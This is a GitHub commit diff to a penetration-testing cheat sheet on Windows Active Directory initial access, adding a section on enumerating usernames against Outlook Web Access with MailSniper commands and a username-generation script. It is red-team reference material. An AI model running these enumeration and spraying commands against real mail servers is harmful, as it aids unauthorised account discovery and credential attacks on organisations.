Skip to content

Commit

Permalink
Update Initial-Access.md
Browse files Browse the repository at this point in the history
  • Loading branch information
0xJs authored Mar 15, 2022
1 parent 53c6b57 commit 986e685
Showing 1 changed file with 40 additions and 10 deletions.
50 changes: 40 additions & 10 deletions windows-ad/Initial-Access.md
Original file line number Diff line number Diff line change
@@ -1,18 +1,48 @@
# Initial Access attacks
* [Web Attacks](#Web-Attacks)
* [Password Attacks](#Password-Attacks)
* [Enumerate users](#Enumerate-users)
* [AS-REP Roasting](#AS-REP-Roasting)
* [Relaying Attacks](#Relaying-Attacks)
* [SMB relaying](#SMB-relaying)
* [LDAP Relaying](#LDAP-Relaying)
* [LDAPS Relaying](#LDAPS-Relaying)
* [Resource Based Constrained Delegation Webclient Attack](#Resource-Based-Constrained-Delegation-Webclient-Attack)

* [From the outside](#From-the-outside)
* [Web Attacks](#Web-Attacks)
* [Password Attacks](#Password-Attacks)
* [From the inside](#From-the-inside)
* [Web Attacks](#Web-Attacks2)
* [Password Attacks](#Password-Attacks2)
* [Enumerate users](#Enumerate-users)
* [AS-REP Roasting](#AS-REP-Roasting)
* [Relaying Attacks](#Relaying-Attacks)
* [SMB relaying](#SMB-relaying)
* [LDAP Relaying](#LDAP-Relaying)
* [LDAPS Relaying](#LDAPS-Relaying)
* [Resource Based Constrained Delegation Webclient Attack](#Resource-Based-Constrained-Delegation-Webclient-Attack)

# From the outside
## Web Attacks
- It is possible to get access by abusing a lot of web attacks which might give you access to the system. There are to many to subscribe here, but I might make a list someday.

## Password Attacks
### Spray against OWA
- https://github.com/dafthack/MailSniper

#### Get NETBIOS name
```
Invoke-DomainHarvestOWA -ExchHostname <IP>
```

#### Generate list of usernames
- https://gist.github.com/superkojiman/11076951
- Needs list of possible names and lastnames from recon. Example: John Doe
```
/opt/namemash.py names.txt >> possible-usernames.txt
```

#### Spray with MailSniper
```
Invoke-UsernameHarvestOWA -ExchHostname <IP> -Domain <DOMAIN> -UserList .\possible-usernames.txt -OutFile valid.txt
```

# From the inside
## Web Attacks2
- It is possible to get access by abusing a lot of web attacks which might give you access to the system. There are to many to subscribe here, but I might make a list someday.

## Password Attacks2
### Enumerate users
- https://github.com/ropnop/kerbrute
```
Expand Down

0 comments on commit 986e685

Please sign in to comment.